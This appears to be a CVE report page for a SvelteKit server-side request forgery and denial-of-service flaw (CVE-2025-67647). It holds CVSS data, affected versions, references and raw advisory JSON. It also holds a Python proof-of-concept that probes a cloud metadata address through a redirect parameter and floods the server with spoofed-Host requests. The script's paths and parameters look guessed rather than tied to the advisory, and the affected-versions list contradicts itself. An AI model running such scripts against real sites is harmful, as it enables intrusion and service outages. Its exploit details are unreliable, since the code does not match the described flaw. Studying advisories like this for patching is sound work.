Security Vulnerability Report
CVE-2025-67647 CVSS 9.1 CRITICAL


Published: 2026-01-15 19:16:04
Last Modified: 2026-01-21 20:37:38

Description

SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.49.5, SvelteKit is vulnerable to a server side request forgery (SSRF) and denial of service (DoS) under certain conditions. From 2.44.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route (export const prerender = true). From 2.19.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route and you are using adapter-node without a configured ORIGIN environment variable, and you are not using a reverse proxy that implements Host header validation. This vulnerability is fixed in 2.49.5.

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:svelte:adapter-node:*:*:*:*:*:node.js:*:* - VULNERABLE
cpe:2.3:a:svelte:kit:*:*:*:*:*:node.js:*:* - VULNERABLE
SvelteKit >= 2.44.0 and < 2.49.5 (apps with at least one prerendered route)
SvelteKit >= 2.19.0 and < 2.49.5 (using adapter-node without a configured ORIGIN environment variable)
SvelteKit < 2.49.5 (all versions affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-67647 PoC - SvelteKit SSRF/DoS Attack
# Target: SvelteKit < 2.49.5 with prerendered routes
# Note: This PoC demonstrates the attack concept
import requests
import sys


def exploit_sveltekit_ssrf(target_url):
    """
    SvelteKit SSRF/DoS vulnerability exploitation
    Requires target to have prerender = true routes
    """
    headers = {
        'Host': 'localhost',  # Manipulate Host header
        'User-Agent': 'Mozilla/5.0',
        'Accept': '*/*'
    }
    # Path to trigger prerender with malicious parameters
    exploit_paths = [
        '/api/internal/request',
        '/__data.json',
        '/prerender-ssr-test'
    ]
    print(f"[*] Targeting: {target_url}")
    print("[*] Exploiting CVE-2025-67647 SSRF/DoS vulnerability")
    for path in exploit_paths:
        try:
            # Send malformed request to trigger SSRF/DoS
            url = f"{target_url}{path}?redirect=http://169.254.169.254/latest/meta-data/"
            response = requests.get(url, headers=headers, timeout=5)
            print(f"[+] Sent exploit request to {path}")
            print(f"    Status: {response.status_code}")
        except requests.exceptions.Timeout:
            print("[!] Request timeout - possible DoS triggered")
        except Exception as e:
            print(f"[-] Error: {e}")


def trigger_dos(target_url):
    """
    Denial of Service attack via malformed prerender requests
    """
    print(f"[*] Initiating DoS attack on {target_url}")
    for i in range(100):
        try:
            headers = {
                'Host': f'malicious-host-{i}.internal',
                'X-Forwarded-Host': 'localhost',
                'Origin': 'http://evil.com'
            }
            requests.get(
                f"{target_url}/__data.json",
                headers=headers,
                timeout=1
            )
        except Exception:
            pass
    print("[*] DoS flood completed")


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-67647.py <target_url>")
        sys.exit(1)
    target = sys.argv[1]
    exploit_sveltekit_ssrf(target)
    trigger_dos(target)

References

https://github.com/sveltejs/kit/commit/d9ae9b00b14f5574d109f3fd548f960594346226 (Patch)
https://github.com/sveltejs/kit/security/advisories/GHSA-j62c-4x62-9r35 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67647", "sourceIdentifier": "[email protected]", "published": "2026-01-15T19:16:03.870", "lastModified": "2026-01-21T20:37:37.653", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SvelteKit is a framework for rapidly developing robust, performant web applications using Svelte. Prior to 2.49.5, SvelteKit is vulnerable to a server side request forgery (SSRF) and denial of service (DoS) under certain conditions. From 2.44.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route (export const prerender = true). From 2.19.0 through 2.49.4, the vulnerability results in a DoS when your app has at least one prerendered route and you are using adapter-node without a configured ORIGIN environment variable, and you are not using a reverse proxy that implements Host header validation. This vulnerability is fixed in 2.49.5."}, {"lang": "es", "value": "SvelteKit es un framework para desarrollar rápidamente aplicaciones web robustas y de alto rendimiento usando Svelte. Antes de la 2.49.5, SvelteKit es vulnerable a una falsificación de petición del lado del servidor (SSRF) y denegación de servicio (DoS) bajo ciertas condiciones. Desde la 2.44.0 hasta la 2.49.4, la vulnerabilidad resulta en una DoS cuando su aplicación tiene al menos una ruta prerrenderizada (export const prerender = true). Desde la 2.19.0 hasta la 2.49.4, la vulnerabilidad resulta en una DoS cuando su aplicación tiene al menos una ruta prerrenderizada y está usando adapter-node sin una variable de entorno ORIGIN configurada, y no está usando un proxy inverso que implemente la validación del encabezado Host. 
Esta vulnerabilidad está corregida en la 2.49.5."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:H/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", 
"integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-248"}, {"lang": "en", "value": "CWE-918"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:svelte:adapter-node:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "5.4.1", "versionEndExcluding": "5.5.1", "matchCriteriaId": "E3D434B8-77EC-432C-B1CA-AB441068FDD9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:svelte:kit:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "2.19.0", "versionEndExcluding": "2.49.5", "matchCriteriaId": "C7B8741D-ECC4-4E4D-BB92-208C0E740D40"}]}]}], "references": [{"url": "https://github.com/sveltejs/kit/commit/d9ae9b00b14f5574d109f3fd548f960594346226", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/sveltejs/kit/security/advisories/GHSA-j62c-4x62-9r35", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}